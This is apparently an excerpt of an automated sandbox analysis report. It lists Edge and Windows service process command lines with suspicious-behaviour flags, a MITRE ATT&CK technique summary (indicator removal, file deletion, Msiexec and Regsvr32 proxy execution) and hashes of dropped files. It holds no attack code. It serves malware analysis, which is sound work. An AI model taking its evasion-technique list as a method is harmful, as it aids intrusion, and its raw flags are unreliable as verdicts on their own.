C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:85⤵PID:2684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:15⤵PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4216 /prefetch:15⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:15⤵PID:5096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:15⤵PID:1448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:15⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:15⤵PID:1932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,7820848039474086060,38746796668182835,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:208
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3356
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2692
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2System Binary Proxy Execution
2Msiexec
1Regsvr32
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD59ed1e3770f38355cfb627ad9922e089a
SHA1801df41a3bd5fad617bdb6a044a17610dfefa9c0
SHA256e1af9770b4cbab3373b526fa1942468c96b7d5c2dc940fd88e28ceb0251c2a60
SHA512293aa30b13b1f699ae348f84593da79b19c0711b7e83bb1b5d0b02243479ddaa9f17042a17aa9e135ac21bc089e301d128466d83cf2dd0ba4a72aa97404dd1b8
-
Filesize
152B
MD5b9569e123772ae290f9bac07e0d31748
SHA15806ed9b301d4178a959b26d7b7ccf2c0abc6741
SHA25620ab88e23fb88186b82047cd0d6dc3cfa23422e4fd2b8f3c8437546a2a842c2b
SHA512cfad8ce716ac815b37e8cc0e30141bfb3ca7f0d4ef101289bddcf6ed3c579bc34d369f2ec2f2dab98707843015633988eb97f1e911728031dd897750b8587795
-
Filesize
6KB
MD505dd0a4757c17993b6a3d4be3e7f7a9c
SHA11b21c30a601402e2198539d70ca1320b98970792
SHA256915742e221dc451128f7a2be82c9203cdd8bced90a35e8a11709ad5bbf62eda1
SHA512897854e5f77b6d1d218bd412543c4824d04f8d771821e7f3e60d4de3a9e24199b421470e99d033593ddc3608acc6980c59e2f6f6aea7cf56f3dd639048adb1b6
-
Filesize
6KB
MD58b7260bddfeebaa67e5d43b500ffb653
SHA1c92cc81d57e05d645b3f8f95b880a8e524a9ea74
SHA25629d728ce685826916a9fdc6ac526015f60432295962b0f3e04f671761ae421d6
SHA512f3dfe431419b193da1b5d7f3ad02760511836a87ca74df1391ba03e6a99807361e42521b6e15dd339b33a8c082820ed20afa6e2b48227bed39ec0b00b1eb4be7
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5beb8bb20ca878b90dd071ac7ce907816
SHA13eed4d5d2983479dca682589a1bf31bca4e56a4f
SHA256e96041830bee77878ee14bc62e5f72340a807d914a53037aea6bf762a166ef30
SHA512fcedb7ef5256f25b64243d820f0529d7569a6df60b41b87392a0d26fced6c2659cde377558ab4b0ef008541328565ef9c6dfdb8be7af698dde86f1493dba73f7
-
Filesize
17KB
MD5d518e293233da5c89ef0bfdd8a3425f4
SHA1a0e5d0606ca4623fc0beeb7efe1dd6c28790cbdf
SHA256e7ae65c9c9688fe3140e042dd25dfe0d9c36f9afd8c84ba8aaeb4ac864ae397c
SHA5128473f11789963895615629dcd715067de559169e194df15501faedb47935a6f40d66e0b255aabfc41ab26545e70bc2341acd97cf48c0a57653823decf63023c1
-
Filesize
1KB
MD5947919690674ae37064deafb3fa326db
SHA1b79f7f3ad22c9e84546750502f517d16a7618366
SHA256fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801
SHA512c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b
-
Filesize
4KB
MD5a756835ce38c068139d8fad26cb47fed
SHA1c1bb3d145188606d07e7b29d86ea6a08586e268d
SHA256d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78
SHA512d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac
-
Filesize
56KB
MD591de8a79098ac3d20726e1acb50cd05d
SHA19cb04003c75f0cb63fe0c6dcd22a0c64d63154be
SHA25654f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea
SHA51270cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3
-
Filesize
96KB
MD542ad49ed99c0d41a820316309bc2c3b3
SHA1f447a72b3cbea72e1b56fda8f44fd9f304b4474a
SHA25641ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
SHA5124e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
Filesize
23.7MB
MD5748f21b17f5c97fbf12db662baf97522
SHA10acab6eca1c28ce70c6b9efb936d204319516e40
SHA256412b5f59c0890c63f0580c0def1c077a8584162c61088847f384b48a6f15e9a2
SHA5128265f7e2cbb5ed8b6cbbcb6d25cd22e7e576ac1be67ea35c9a830c58b3be25d7931d4ba4d4c1fe0daad5c74dc4436fb6b6902c1f19d7052ea168ed801bacb055
-
\??\Volume{fa3589b5-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{dfdc9f50-630a-437e-a83c-03c5e8a6c3f1}_OnDiskSnapshotProp
Filesize6KB
MD585b33f3d2db16c53139657fd9f4ed2d2
SHA1f4036b2eeddbb298708489956ebe1f6782b095b5
SHA256194b6846dd408d46df7ac68cb91bd5ed27a12375a16dbad09eddf18b0ab6d9e0
SHA512ba210334ed444df2b6d12220bdbc451f60f57cfd908c87136cd836c50aeda7e78914f78d67424d491a1a7bfaad391cd4eb3bca8a2d33619898a11df7f27bfcee